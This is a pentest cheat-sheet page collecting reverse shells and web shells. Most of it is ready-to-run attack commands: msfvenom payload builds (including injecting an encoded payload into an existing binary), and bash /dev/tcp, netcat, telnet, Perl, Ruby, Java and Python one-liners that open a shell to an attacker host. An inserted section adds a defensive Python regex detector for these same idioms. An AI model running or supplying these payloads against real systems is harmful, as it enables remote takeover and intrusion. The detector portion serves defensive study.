Shells

Last updated 4 years ago

Reverse-shells

This is a great collection of different types of reverse shells and web shells. Many of the ones listed below come from the cheat sheets linked at the end of this page.

Windows

Meterpreter

Standard meterpreter

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Meterpreter HTTPS

This makes the Meterpreter traffic look like ordinary HTTPS. Because the session is wrapped in HTTPS the communication is encrypted, which also lets it pass deep-packet inspection.

msfvenom -p windows/meterpreter/reverse_https LHOST=ip LPORT=443 -f exe -o met_https_reverse.exe

Non-staged payload

msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse_tcp.exe
use exploit/multi/handler
set payload windows/shell_reverse_tcp

Staged payload

This must be caught with Metasploit; it does not work with netcat.

use exploit/multi/handler
set payload windows/shell/reverse_tcp

Inject payload into binary

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe

Linux

Binary

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f elf > shell.elf

Bash

0<&196;exec 196<>/dev/tcp/ip/80; sh <&196 >&196 2>&196
bash -i >& /dev/tcp/ip/8080 0>&1

Php

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'

Netcat

Bind shell

# Linux
nc -vlp 5555 -e /bin/bash
nc ip 5555

# Windows
nc.exe -nlvp 4444 -e cmd.exe

Reverse shell

# Linux
nc -lvp 5555
nc ip 5555 -e /bin/bash

# Windows
nc -lvp 443
nc.exe ip 443 -e cmd.exe

With -e flag

nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80

Without -e flag

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0</tmp/p | /bin/sh 1>/tmp/p

Ncat

Ncat is a more modern reimplementation of netcat (it ships with Nmap). One feature it has that classic netcat lacks is encryption: on a pentest job you may not want the shell traffic to cross the wire unencrypted.

Bind

ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
ncat -v ip 5555 --ssl

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/bash 1>/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Perl

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
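As a defender's counterpart to the one-liners above, here is an added example (not part of the original cheat sheet) that flags each of these idioms in process command-line telemetry. The sample entries, including the host 10.0.0.5, are constructed for this example, and the regexes are illustrative assumptions rather than a vetted ruleset.

```python
import re

# Constructed process command lines, in the shape an EDR or auditd EXECVE feed
# would record them. The host 10.0.0.5 and the two benign entries are made up.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/10.0.0.5/8080 0>&1",
    "0<&196;exec 196<>/dev/tcp/10.0.0.5/80; sh <&196 >&196 2>&196",
    "nc 10.0.0.5 5555 -e /bin/bash",
    "nc.exe 10.0.0.5 443 -e cmd.exe",
    "ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl",
    "rm -f /tmp/p; mknod /tmp/p p && nc 10.0.0.5 4444 0</tmp/p | /bin/sh 1>/tmp/p",
    "php -r '$sock=fsockopen(\"10.0.0.5\",80);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.5\",80).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
    "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",80));"
    "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
    "grep -r /dev/tcp /etc/hosts",  # benign: no host/port redirection follows /dev/tcp
    "nc -zv 10.0.0.5 22",           # benign: port probe, no program handed to the socket
]

# One regex per idiom on the cheat sheet. These are illustrative assumptions for
# this example, not a vetted ruleset; tune them against your own process telemetry.
RULES = {
    # bash redirection to /dev/tcp/<host>/<port>: `>& /dev/tcp/ip/8080`, `196<>/dev/tcp/ip/80`
    "bash_dev_tcp": re.compile(r"[<>&]\s*/dev/tcp/[\w.-]+/\d+"),
    # netcat/ncat handing a shell to the socket: `nc ip 5555 -e /bin/bash`, `ncat --exec cmd.exe`
    "nc_exec_shell": re.compile(
        r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s(?:-e|-c|--exec|--sh-exec)\s+\S*(?:sh|cmd)\b"),
    # named-pipe trick used when nc has no -e: `mknod /tmp/p p ... | /bin/sh 1>/tmp/p`
    "fifo_pipe_shell": re.compile(r"(?:mknod\s+\S+\s+p\b|mkfifo\b).*\|\s*/bin/(?:ba)?sh\b"),
    # interpreter one-liners: a socket is opened, then a shell is exec'd across it
    "interp_socket_shell": re.compile(
        r"\b(?:python\d?|perl|ruby|php)\b.*(?:socket\.socket|fsockopen|TCPSocket|connect\().*"
        r"(?:/bin/(?:ba)?sh|cmd\.exe)"),
}

def classify(cmdline):
    """Return the sorted names of every rule that fires on one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(cmdlines):
    """Return [(cmdline, [rule names])] for each command line that trips a rule."""
    flagged = []
    for line in cmdlines:
        names = classify(line)
        if names:
            flagged.append((line, names))
    return flagged
```

Running `scan(SAMPLE_CMDLINES)` flags the nine shell one-liners and leaves the two benign entries alone; in practice, feed it the command-line field of your process-creation events.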

Web-shells

PHP

This PHP shell is OS-independent; it works on both Linux and Windows.

msfvenom -p php/meterpreter_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f asp > shell.asp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f war > shell.war

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.jsp

https://highon.coffee/blog/reverse-shell-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet